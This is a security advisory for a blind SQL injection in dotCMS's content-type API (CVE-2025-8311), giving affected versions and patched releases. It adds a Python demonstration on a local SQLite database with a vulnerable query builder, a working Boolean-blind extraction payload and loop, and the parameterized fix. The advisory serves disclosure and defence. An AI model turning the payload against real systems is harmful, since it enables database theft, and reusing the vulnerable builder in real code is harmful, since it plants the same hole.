PT-2025-35943 · Dotcms · Dotcms
Matan Sandori · Published 2025-09-04 · Updated 2025-09-04
CVE-2025-8311 · CVSS v4.0 9.4 (Critical)
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
dotCMS versions 24.03.22 and after
Description
A Boolean-based blind SQL injection vulnerability exists in the /api/v1/contenttype endpoint. The endpoint accepts a sites query parameter containing a comma-separated list of site identifiers or keys. The value of sites is concatenated directly into a SQL query without parameterization or sanitization, so an authenticated attacker with low privileges can inject SQL and infer database contents from differences in the response. This allows extraction of data from the database, privilege escalation, or denial of service. Exploitation was verified with tools such as SQLMap, which enabled full database exfiltration; crafted payloads can also trigger denial-of-service conditions.
Recommendations
Update to dotCMS version 25.08.14 or later.
Update to dotCMS version 25.07.10-1v2 LTS or later.
Update to dotCMS version 24.12.27v10 LTS or later.
Update to dotCMS version 24.04.24v21 LTS or later.
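The description above names the pattern behind the bug: a comma-separated list of site keys is split and each value is concatenated into the query text. The following is an added example, not dotCMS code and not the vendor's fix; it models that pattern in Python against an in-memory SQLite database. The table and column names (host, structure, secret), the helper names and the sample token are assumptions for illustration only. It shows the vulnerable list builder, a Boolean-based blind oracle that recovers a value one character at a time the way SQLMap would, and the parameterized IN-list that closes the hole.

```python
import sqlite3
import string

# Constructed in-memory database standing in for a CMS backend. The table and
# column names are assumptions for this example, not dotCMS's real schema.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE host (identifier TEXT PRIMARY KEY, host_key TEXT);
        CREATE TABLE structure (inode TEXT PRIMARY KEY, name TEXT, host TEXT);
        CREATE TABLE secret (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO host VALUES ('h1', 'demo.example'), ('h2', 'other.example');
        INSERT INTO structure VALUES ('s1', 'Blog', 'h1'), ('s2', 'News', 'h2');
        INSERT INTO secret VALUES (1, 'api-key-4711');
    """)
    return con


def vulnerable_lookup(con, sites):
    """Vulnerable pattern (hypothetical): split the comma-separated `sites`
    value and quote each piece straight into the IN (...) list. A single quote
    in any piece breaks out of the literal and the rest becomes SQL."""
    quoted = ",".join("'" + s + "'" for s in sites.split(","))
    sql = f"SELECT name FROM structure WHERE host IN ({quoted}) ORDER BY name"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, sites):
    """Hardened form: one bind placeholder per list element. The values never
    touch the SQL text, so a quote or keyword inside them is just data."""
    keys = [s for s in sites.split(",") if s]
    if not keys:
        return []  # avoid an empty IN () which some databases reject
    placeholders = ",".join("?" * len(keys))
    sql = f"SELECT name FROM structure WHERE host IN ({placeholders}) ORDER BY name"
    return [row[0] for row in con.execute(sql, keys)]


def blind_extract_token(con, lookup, max_len=32):
    """Boolean-based blind extraction against `lookup`: the response contains
    rows exactly when the injected predicate is true, so the secret is
    recovered one character at a time. GLOB is used instead of substr()
    because the payload must not contain commas (the builder splits on them)."""
    charset = string.ascii_lowercase + string.digits + "-"
    prefix = ""
    for _ in range(max_len):
        for c in charset:
            # Closes the IN list after 'h1', appends the predicate, and lets the
            # builder's trailing quote terminate the GLOB pattern literal.
            payload = f"h1') AND (SELECT token FROM secret) GLOB ('{prefix}{c}*"
            if lookup(con, payload):
                prefix += c
                break
        else:
            break  # no character matched: end of the secret
    return prefix


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", blind_extract_token(db, vulnerable_lookup))
    print("hardened:  ", repr(blind_extract_token(db, safe_lookup)))
```

Against the vulnerable builder the oracle recovers the whole token with nothing but "rows returned / no rows returned" as feedback, which is exactly the signal a Boolean-blind tool needs. Against the parameterized builder every probe is bound as a single opaque key, matches nothing, and the loop terminates immediately. Binding each list element is the fix; checking each element against the expected identifier format before binding is cheap defense in depth.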
Tags: Exploit, Fix, DoS, LPE, SQL injection
Affected Products
Dotcms